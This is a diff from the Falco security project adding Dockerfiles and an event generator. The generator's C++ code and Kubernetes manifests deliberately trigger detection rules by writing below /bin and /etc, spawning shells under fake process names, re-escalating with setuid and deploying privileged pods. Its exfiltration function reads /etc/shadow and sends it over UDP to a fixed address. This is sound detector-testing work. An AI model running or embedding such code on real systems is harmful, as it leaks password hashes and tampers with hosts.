 LABEL name="falcosecurity/falco-builder"
 LABEL usage="docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder cmake"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG BUILD_TYPE=release
 ARG BUILD_DRIVER=OFF

docker/dev/Dockerfile

@@ -0,0 +1,110 @@
+FROM debian:unstable
+
+LABEL maintainer="opensource@sysdig.com"
+
+ENV FALCO_REPOSITORY dev
+
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
+RUN apt-get update \
+	&& apt-get install -y --no-install-recommends \
+	bash-completion \
+	bc \
+	clang-7 \
+	ca-certificates \
+	curl \
+	dkms \
+	gnupg2 \
+	gcc \
+	gdb \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	llvm-7 \
+	netcat \
+	xz-utils \
+	&& rm -rf /var/lib/apt/lists/*
+
+# gcc 6 is no longer included in debian unstable, but we need it to
+# build kernel modules on the default debian-based ami used by
+# kops. So grab copies we've saved from debian snapshots with the
+# prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
+# or so.
+
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+	&& curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
+	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+
+# gcc 5 is no longer included in debian unstable, but we need it to
+# build centos kernels, which are 3.x based and explicitly want a gcc
+# version 3, 4, or 5 compiler. So grab copies we've saved from debian
+# snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
+
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
+	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
+
+RUN rm -rf /usr/bin/clang \
+	&& rm -rf /usr/bin/llc \
+	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
+	&& ln -s /usr/bin/llc-7 /usr/bin/llc
+
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+	&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+	&& apt-get update \
+	&& apt-get install -y --no-install-recommends falco \
+	&& apt-get clean \
+	&& rm -rf /var/lib/apt/lists/*
+
+# Change the falco config within the container to enable ISO 8601
+# output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+	&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+	&& ln -s $HOST_ROOT/lib/modules /lib/modules
+
+# debian:unstable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
+	&& curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
+	&& dpkg -i *binutils*.deb \
+	&& rm -f *binutils*.deb
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/dev/docker-entrypoint.sh

@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+# set -e
+
+# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+
+if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in "$HOST_ROOT/usr/src"/*
+    do
+        ln -s "$i" "/usr/src/$i"
+    done
+
+    /usr/bin/falco-probe-loader
+fi
+
+exec "$@"

docker/driver-loader/Dockerfile

@@ -1,13 +0,0 @@
-ARG FALCO_IMAGE_TAG=latest
-FROM falcosecurity/falco:${FALCO_IMAGE_TAG}
-
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-
-LABEL usage="docker run -i -t -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-
-ENV HOST_ROOT /host
-ENV HOME /root
-
-COPY ./docker-entrypoint.sh /
-
-ENTRYPOINT ["/docker-entrypoint.sh"]

docker/event-generator/Dockerfile

@@ -0,0 +1,10 @@
+FROM alpine:latest
+LABEL maintainer="opensource@sysdig.com"
+RUN apk add --no-cache bash g++ curl
+COPY ./event_generator.cpp /usr/local/bin
+COPY ./docker-entrypoint.sh ./k8s_event_generator.sh /
+COPY ./yaml /yaml
+RUN mkdir -p /var/lib/rpm
+RUN g++ --std=c++0x /usr/local/bin/event_generator.cpp -o /usr/local/bin/event_generator
+RUN curl -o /usr/local/bin/kubectl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl && chmod +x /usr/local/bin/kubectl
+ENTRYPOINT ["/docker-entrypoint.sh"]

docker/event-generator/Makefile

@@ -1,6 +1,5 @@
-#!/usr/bin/env bash
 #
-# Copyright (C) 2020 The Falco Authors.
+# Copyright (C) 2019 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -15,14 +14,5 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
-
-
-echo "* Setting up /usr/src links from host"
-
-for i in "$HOST_ROOT/usr/src"/*
-do
-    base=$(basename "$i")
-    ln -s "$i" "/usr/src/$base"
-done
-
-/usr/bin/falco-driver-loader $1
+image:
+	docker build -t sysdig/falco-event-generator:latest .

docker/event-generator/docker-entrypoint.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+CMD=${1:-syscall}
+
+shift
+
+set -euo pipefail
+
+if [[ "$CMD" == "syscall" ]]; then
+    /usr/local/bin/event_generator
+elif [[ "$CMD" == "k8s_audit" ]]; then
+    . k8s_event_generator.sh
+elif [[ "$CMD" == "bash" ]]; then
+    bash
+else
+    echo "Unknown command. Can be one of"
+    echo "   \"syscall\": generate falco syscall-related activity"
+    echo "   \"k8s_audit\": generate falco k8s audit-related activity"
+    echo "   \"bash\": spawn a shell"
+    exit 1
+fi

docker/event-generator/event_generator.cpp

@@ -0,0 +1,535 @@
+/*
+Copyright (C) 2019 The Falco Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+#include <cstdio>
+#include <utility>
+#include <map>
+#include <set>
+#include <string>
+#include <fstream>
+#include <sstream>
+#include <cstring>
+#include <cstdlib>
+#include <unistd.h>
+#include <getopt.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <pwd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+
+using namespace std;
+
+void usage(char *program)
+{
+	printf("Usage %s [options]\n\n", program);
+	printf("Options:\n");
+	printf("     -h/--help: show this help\n");
+	printf("     -a/--action: actions to perform. Can be one of the following:\n");
+	printf("          write_binary_dir                           Write to files below /bin\n");
+	printf("          write_etc                                  Write to files below /etc\n");
+	printf("          read_sensitive_file                        Read a sensitive file\n");
+	printf("          read_sensitive_file_after_startup          As a trusted program, wait a while,\n");
+	printf("                                                     then read a sensitive file\n");
+	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
+	printf("          spawn_shell                                Run a shell (bash)\n");
+	printf("                                                     Used by spawn_shell_under_httpd below\n");
+	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
+	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
+	printf("                                                     another program\n");
+	printf("          modify_binary_dirs                         Modify a file below /bin\n");
+	printf("          mkdir_binary_dirs                          Create a directory below /bin\n");
+	printf("          change_thread_namespace                    Change namespace\n");
+	printf("          system_user_interactive                    Change to a system user and try to\n");
+	printf("                                                     run an interactive command\n");
+	printf("          network_activity                           Open network connections\n");
+	printf("                                                     (used by system_procs_network_activity below)\n");
+	printf("          system_procs_network_activity              Open network connections as a program\n");
+	printf("                                                     that should not perform network actions\n");
+	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
+	printf("          create_files_below_dev                     Create files below /dev\n");
+	printf("          exec_ls                                    execve() the program ls\n");
+	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
+	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
+	printf("                                                     rules related to user management programs\n");
+	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
+	printf("                                                     specific address and port\n");
+	printf("          all                                        All of the above\n");
+	printf("       The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
+	printf("           as a colon-separated list\n");
+	printf("       if specified, -a/--action overrides any environment variables\n");
+	printf("     -i/--interval: Number of seconds between actions\n");
+	printf("     -o/--once: Perform actions once and exit\n");
+}
+
+void open_file(const char *filename, const char *flags)
+{
+	FILE *f = fopen(filename, flags);
+	if(f)
+	{
+		fclose(f);
+	}
+	else
+	{
+		fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
+	}
+}
+
+void exfiltration()
+{
+	ifstream shadow;
+
+	shadow.open("/etc/shadow");
+
+	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
+
+	if(!shadow.is_open())
+	{
+		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
+		return;
+	}
+
+	string line;
+	string shadow_contents;
+	while(getline(shadow, line))
+	{
+		shadow_contents += line;
+		shadow_contents += "\n";
+	}
+
+	int rc;
+	ssize_t sent;
+	int sock = socket(PF_INET, SOCK_DGRAM, 0);
+	struct sockaddr_in dest;
+
+	dest.sin_family = AF_INET;
+	dest.sin_port = htons(8197);
+	inet_aton("10.5.2.6", &(dest.sin_addr));
+
+	if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0)
+	{
+		fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
+		return;
+	}
+
+	if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
+	{
+		fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
+		return;
+	}
+
+	close(sock);
+}
+
+void touch(const char *filename)
+{
+	open_file(filename, "w");
+}
+
+void read(const char *filename)
+{
+	open_file(filename, "r");
+}
+
+void become_user(const char *user)
+{
+	struct passwd *pw;
+	pw = getpwnam(user);
+	if(pw == NULL)
+	{
+		fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
+		exit(1);
+	}
+
+	int rc = setuid(pw->pw_uid);
+
+	if(rc != 0)
+	{
+		fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
+		exit(1);
+	}
+}
+
+void spawn(const char *cmd, char **argv, char **env)
+{
+	pid_t child;
+
+	// Fork a process, that way proc.duration is reset
+	if((child = fork()) == 0)
+	{
+		execve(cmd, argv, env);
+		fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void respawn(const char *cmd, const char *action, const char *interval)
+{
+	char *argv[] = {(char *)cmd,
+			(char *)"--action", (char *)action,
+			(char *)"--interval", (char *)interval,
+			(char *)"--once", NULL};
+
+	char *env[] = {NULL};
+
+	spawn(cmd, argv, env);
+}
+
+void write_binary_dir()
+{
+	printf("Writing to /bin/created-by-event-generator-sh...\n");
+	touch("/bin/created-by-event-generator-sh");
+}
+
+void write_etc()
+{
+	printf("Writing to /etc/created-by-event-generator-sh...\n");
+	touch("/etc/created-by-event-generator-sh");
+}
+
+void read_sensitive_file()
+{
+	printf("Reading /etc/shadow...\n");
+	read("/etc/shadow");
+}
+
+void read_sensitive_file_after_startup()
+{
+	printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
+	respawn("./httpd", "read_sensitive_file", "6");
+}
+
+void write_rpm_database()
+{
+	printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
+	touch("/var/lib/rpm/created-by-event-generator-sh");
+}
+
+void spawn_shell()
+{
+	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
+	int rc;
+
+	if((rc = system("ls > /dev/null")) != 0)
+	{
+		fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
+	}
+}
+
+void spawn_shell_under_httpd()
+{
+	printf("Becoming the program \"httpd\" and then spawning a shell\n");
+	respawn("./httpd", "spawn_shell", "0");
+}
+
+void db_program_spawn_process()
+{
+	printf("Becoming the program \"mysql\" and then running ls\n");
+	respawn("./mysqld", "exec_ls", "0");
+}
+
+void modify_binary_dirs()
+{
+	printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
+
+	if(rename("/bin/true", "/bin/true.event-generator-sh") != 0)
+	{
+		fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
+	}
+	else
+	{
+		if(rename("/bin/true.event-generator-sh", "/bin/true") != 0)
+		{
+			fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
+		}
+	}
+}
+
+void mkdir_binary_dirs()
+{
+	printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
+	if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
+	{
+		fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
+	}
+}
+
+void change_thread_namespace()
+{
+	printf("Calling setns() to change namespaces...\n");
+	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
+	// It doesn't matter that the arguments to setns are
+	// bogus. It's the attempt to call it that will trigger the
+	// rule.
+	setns(0, 0);
+}
+
+void system_user_interactive()
+{
+	pid_t child;
+
+	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
+	// Fork a child and do everything in the child.
+	if((child = fork()) == 0)
+	{
+		become_user("daemon");
+		char *argv[] = {(char *)"/bin/login", NULL};
+		char *env[] = {NULL};
+		spawn("/bin/login", argv, env);
+		exit(0);
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void network_activity()
+{
+	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
+	int rc;
+	int sock = socket(PF_INET, SOCK_DGRAM, 0);
+	struct sockaddr_in localhost;
+
+	localhost.sin_family = AF_INET;
+	localhost.sin_port = htons(8192);
+	inet_aton("10.2.3.4", &(localhost.sin_addr));
+
+	if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0)
+	{
+		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
+		return;
+	}
+
+	close(sock);
+}
+
+void system_procs_network_activity()
+{
+	printf("Becoming the program \"sha1sum\" and then performing network activity\n");
+	respawn("./sha1sum", "network_activity", "0");
+}
+
+void non_sudo_setuid()
+{
+	pid_t child;
+
+	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
+
+	// Fork a child and do everything in the child.
+	if((child = fork()) == 0)
+	{
+		// First setuid to something non-root. Then try to setuid back to root.
+		become_user("daemon");
+		become_user("root");
+		exit(0);
+	}
+	else
+	{
+		int status;
+		waitpid(child, &status, 0);
+	}
+}
+
+void create_files_below_dev()
+{
+	printf("Creating /dev/created-by-event-generator-sh...\n");
+	touch("/dev/created-by-event-generator-sh");
+}
+
+void exec_ls()
+{
+	char *argv[] = {(char *)"/bin/ls", NULL};
+	char *env[] = {NULL};
+	spawn("/bin/ls", argv, env);
+}
+
+void user_mgmt_binaries()
+{
+	printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
+	printf("NOTE: does not result in a falco notification in containers\n");
+	respawn("./vipw", "exec_ls", "0");
+}
+
+typedef void (*action_t)();
+
+map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
+					 {"write_etc", write_etc},
+					 {"read_sensitive_file", read_sensitive_file},
+					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
+					 {"write_rpm_database", write_rpm_database},
+					 {"spawn_shell", spawn_shell},
+					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
+					 {"db_program_spawn_process", db_program_spawn_process},
+					 {"modify_binary_dirs", modify_binary_dirs},
+					 {"mkdir_binary_dirs", mkdir_binary_dirs},
+					 {"change_thread_namespace", change_thread_namespace},
+					 {"system_user_interactive", system_user_interactive},
+					 {"network_activity", network_activity},
+					 {"system_procs_network_activity", system_procs_network_activity},
+					 {"non_sudo_setuid", non_sudo_setuid},
+					 {"create_files_below_dev", create_files_below_dev},
+					 {"exec_ls", exec_ls},
+					 {"user_mgmt_binaries", user_mgmt_binaries},
+					 {"exfiltration", exfiltration}};
+
+// Some actions don't directly result in suspicious behavior. These
+// actions are excluded from the ones run with -a all.
+set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
+
+void create_symlinks(const char *program)
+{
+	int rc;
+
+	// Some actions depend on this program being re-run as
+	// different program names like 'mysqld', 'httpd', etc. This
+	// sets up all the required symlinks.
+	const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
+
+	for(unsigned int i = 0; progs[i] != NULL; i++)
+	{
+		unlink(progs[i]);
+
+		if((rc = symlink(program, progs[i])) != 0)
+		{
+			fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
+		}
+	}
+}
+
+void run_actions(map<string, action_t> &actions, int interval, bool once)
+{
+	while(true)
+	{
+		for(auto action : actions)
+		{
+			printf("***Action %s\n", action.first.c_str());
+			action.second();
+			sleep(interval);
+		}
+		if(once)
+		{
+			break;
+		}
+	}
+}
+
+int main(int argc, char **argv)
+{
+	map<string, action_t> actions;
+	int op;
+	int long_index = 0;
+	int interval = 1;
+	bool once = false;
+	map<string, action_t>::iterator it;
+
+	static struct option long_options[] =
+		{
+			{"help", no_argument, 0, 'h'},
+			{"action", required_argument, 0, 'a'},
+			{"interval", required_argument, 0, 'i'},
+			{"once", no_argument, 0, 'o'},
+
+			{0, 0}};
+
+	//
+	// Parse the args
+	//
+	while((op = getopt_long(argc, argv,
+				"ha:i:l:o",
+				long_options, &long_index)) != -1)
+	{
+		switch(op)
+		{
+		case 'h':
+			usage(argv[0]);
+			exit(1);
+		case 'a':
+			// "all" is already implied
+			if(strcmp(optarg, "all") != 0)
+			{
+				if((it = defined_actions.find(optarg)) == defined_actions.end())
+				{
+					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
+					exit(1);
+				}
+				actions.insert(*it);
+			}
+			break;
+		case 'i':
+			interval = atoi(optarg);
+			break;
+		case 'o':
+			once = true;
+			break;
+		default:
+			usage(argv[0]);
+			exit(1);
+		}
+	}
+
+	//
+	// Also look for actions in the environment. If specified, they
+	// override any specified on the command line.
+	//
+	char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
+
+	if(env_action)
+	{
+		actions.clear();
+
+		string envs(env_action);
+		istringstream ss(envs);
+		string item;
+		while(std::getline(ss, item, ':'))
+		{
+			if((it = defined_actions.find(item)) == defined_actions.end())
+			{
+				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
+				exit(1);
+			}
+			actions.insert(*it);
+		}
+	}
+
+	if(actions.size() == 0)
+	{
+		for(auto &act : defined_actions)
+		{
+			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
+			{
+				actions.insert(act);
+			}
+		}
+	}
+
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+	// Only create symlinks when running as the program event_generator
+	if(strstr(argv[0], "generator"))
+	{
+		create_symlinks(argv[0]);
+	}
+
+	run_actions(actions, interval, once);
+}

docker/event-generator/k8s_event_generator.sh

@@ -0,0 +1,57 @@
+#!/bin/bash
+
+set -euo pipefail
+
+# You can pass a specific falco rule name and only yaml files matching
+# that rule will be considered. The default is "all", meaning all yaml
+# files will be applied.
+
+RULE=${1:-all}
+
+# Replace any '/' in RULES with a '.' and any space with a dash. (K8s
+# label values can not contain slashes/spaces)
+RULE=$(echo "$RULE" | tr '/ ' '.-')
+
+echo "***Testing kubectl configuration..."
+kubectl version --short
+
+while true; do
+
+    RET=$(kubectl get namespaces --output=name | grep falco-event-generator || true)
+
+    if [[ "$RET" == *falco-event-generator* ]]; then
+	echo "***Deleting existing falco-event-generator namespace..."
+	kubectl delete namespace falco-event-generator
+    fi
+
+    echo "***Creating falco-event-generator namespace..."
+    kubectl create namespace falco-event-generator
+
+    for file in yaml/*.yaml; do
+
+	MATCH=0
+	if [[ "${RULE}" == "all" ]]; then
+	    MATCH=1
+	else
+	    RET=$(grep -E "falco.rules:.*${RULE}" $file || true)
+	    if [[ "$RET" != "" ]]; then
+		MATCH=1
+	    fi
+	fi
+
+	if [[ $MATCH == 1 ]]; then
+	    MESSAGES=$(grep -E 'message' $file | cut -d: -f2 | tr '\n' ',')
+	    RULES=$(grep -E 'falco.rules' $file | cut -d: -f2 | tr '\n' ',')
+
+	    # The message uses dashes in place of spaces, convert them back to spaces
+	    MESSAGES=$(echo "$MESSAGES" | tr '-' ' ' | sed -e 's/ *//' | sed  -e 's/,$//')
+	    RULES=$(echo "$RULES" | tr '-' ' '| tr '.' '/' | sed -e 's/ *//' | sed  -e 's/,$//')
+
+	    echo "***$MESSAGES (Rule(s) $RULES)..."
+	    kubectl apply -f $file
+	    sleep 2
+	fi
+    done
+
+    sleep 10
+done

docker/event-generator/yaml/configmap-private-creds.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: private-creds-configmap
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: private-creds-configmap
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create.Modify-Configmap-With-Private-Credentials
+    message: Creating-configmap-with-private-credentials
+data:
+  ui.properties: |
+    color.good=purple
+    color.bad=yellow
+    allow.textmode=true
+    password=some_secret_password

docker/event-generator/yaml/disallowed-pod-deployment.yaml

@@ -0,0 +1,25 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: disallowed-pod-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: disallowed-pod-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Disallowed-Pod
+    message: Creating-pod-with-image-outside-of-allowed-images
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: disallowed-pod-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: disallowed-pod-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/hostnetwork-deployment.yaml

@@ -0,0 +1,26 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: hostnetwork-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: hostnetwork-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-HostNetwork-Pod
+    message: Creating-deployment-with-hostNetwork-true-pod
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: hostnetwork-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: hostnetwork-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      hostNetwork: true
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/nodeport-service.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: Service
+metadata:
+  name: nodeport-service
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: nodeport-service
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-NodePort-Service
+    message: Creating-service-of-type-NodePort
+spec:
+  type: NodePort
+  ports:
+    - port: 80
+  selector:
+    app: busybox

docker/event-generator/yaml/privileged-deployment.yaml

@@ -0,0 +1,27 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: privileged-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: privileged-deployment
